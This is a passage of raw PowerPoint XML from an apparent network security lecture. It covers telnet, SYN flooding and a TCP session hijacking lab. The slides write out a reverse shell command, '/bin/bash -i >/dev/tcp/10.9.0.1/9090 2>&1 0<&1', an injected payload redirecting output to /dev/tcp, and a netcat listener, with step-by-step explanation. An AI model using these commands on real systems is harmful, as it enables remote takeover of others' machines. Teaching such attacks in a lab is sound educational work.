            <a:off x="792632" y="704495"/>
            <a:ext cx="7015950" cy="4104928"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="966766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Telnet Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{571758DF-FE7A-4F5B-9911-9D0CE8FEBE38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403198" y="1247775"/>
            <a:ext cx="8213264"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Client first runs a 3-way handshake protocol with server to establish TCP connection and exchange messages over this TCP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D5231C6-5A35-47B7-862C-EE15A3DFF36D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428108" y="2124078"/>
            <a:ext cx="8404191" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0"/>
              <a:t>: (a) Take input from this TCP connection (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0" err="1"/>
              <a:t>e.g.,via</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0" err="1"/>
              <a:t>recv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0"/>
              <a:t>()) and    execute; (b) print output to this TCP connection, which will be received by client and displayed on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2000"/>
              <a:t>its screen. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37FCE1FE-7C24-470C-95FD-A02C0624FA67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437633" y="3155752"/>
            <a:ext cx="8520599" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.  If Data=“\n touch success”, the server runs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>$ touch success </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Then, instead of displaying the result on the server’s screen, it sends to client (file success is created). </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143162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Shape 60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="693248" y="948543"/>
            <a:ext cx="3878752" cy="511866"/>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Denial of Service (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) Attack</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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6035854" y="578984"/>
            <a:ext cx="2047875" cy="2362200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="674612" y="2587664"/>
            <a:ext cx="6053848" cy="144331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indent="-342900">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Specific </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Attack: SYN Flooding Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      -- Technical details</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      -- C and Python Experiment on telnet servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      -- Counter Measure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77408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Print to attacker’s screen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37FCE1FE-7C24-470C-95FD-A02C0624FA67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="393473" y="1429356"/>
            <a:ext cx="852059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Data=“\r touch success” will print the result to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>legal client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>’s screen (if it would do) but not the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> screen. </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37FCE1FE-7C24-470C-95FD-A02C0624FA67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389734" y="2147501"/>
            <a:ext cx="8520599"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To enable this, use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  Data=“\r touch success    &gt;/dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/10.9.0.1/9090 \r” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>redfines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> the output to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>/dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>/10.9.0.1/9090</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0"/>
              <a:t>Server will explain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/10.9.0.1/9090 as it follows: it first establishes TCP connection to server 10.9.0.1 with port 9090 and writes the output to this new TCP connection. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196427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Launch the TCP Session Hijacking Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{571758DF-FE7A-4F5B-9911-9D0CE8FEBE38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="409059" y="1247775"/>
            <a:ext cx="7315716"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But this still can not be called hijacking!</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EACEF9F-20A4-47CF-A516-77DCC945AFA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="409059" y="1657350"/>
            <a:ext cx="873494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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Desired</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:  take over the telnet client role and interact with server </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D5231C6-5A35-47B7-862C-EE15A3DFF36D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428109" y="2047875"/>
            <a:ext cx="7315716"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Technically, this means:</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0"/>
              <a:t>	1. we can type the input to server from our machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0"/>
              <a:t>	2. obtain the output of server from our machine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37FCE1FE-7C24-470C-95FD-A02C0624FA67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437633" y="3133725"/>
            <a:ext cx="852059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More precisely, we want to</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="8" algn="dist"/>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0"/>
              <a:t>	► redirect the server’s standard input and standard output </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="8"/>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0"/>
              <a:t>                   to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" b="1" dirty="0"/>
              <a:t>our machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3190BC0-43C6-40DA-B6B4-A81843A1498D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437633" y="4057650"/>
            <a:ext cx="7915791" cy="984885"/>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is the command: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t> 	/bin/bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>  &gt;/dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>/10.9.0.1/9090     2&gt;&amp;1      0&lt;&amp;1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(2 for standard error output, 1 for standard output, 0 for standard input)</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1800" dirty="0">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="180411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Launch the TCP Session Hijacking Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3190BC0-43C6-40DA-B6B4-A81843A1498D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294758" y="1238250"/>
            <a:ext cx="791579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What does this magic command do?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t> 	 /bin/bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>  &gt;/dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>/10.9.0.1/9090    2&gt;&amp;1    0&lt;&amp;1</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2000" dirty="0">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B78EC48-A705-48A4-8A5E-66199E8DEF83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304283" y="2076450"/>
            <a:ext cx="8366092"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It redefines the standard out (1) to the new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> connection </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D46B5E1-E3CF-4BE6-AAC6-AE7B08EF7CFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2619375"/>
            <a:ext cx="87561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Assign the standard error output address (descriptor 2) to the address of descriptor 1  (that is, the new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> connection)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D46B5E1-E3CF-4BE6-AAC6-AE7B08EF7CFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="299640" y="3396725"/>
            <a:ext cx="87561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Assign the standard input address (descriptor  0) to the address of descriptor 1  (that is, the new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> connection again)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D46B5E1-E3CF-4BE6-AAC6-AE7B08EF7CFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="366522" y="4206967"/>
            <a:ext cx="87561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Thus, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>intput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, output, error output are all directed to the new connection. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="340479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91965" y="92424"/>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Spoofing for hijacking (hijack_auto.py)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A16295F5-7536-462D-AC22-721CD1ECCE8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530588" y="539322"/>
            <a:ext cx="842324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Run a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> server to take over the hijacked telnet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>  -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>lnv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>  9090  </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2000" dirty="0">
              <a:highlight>
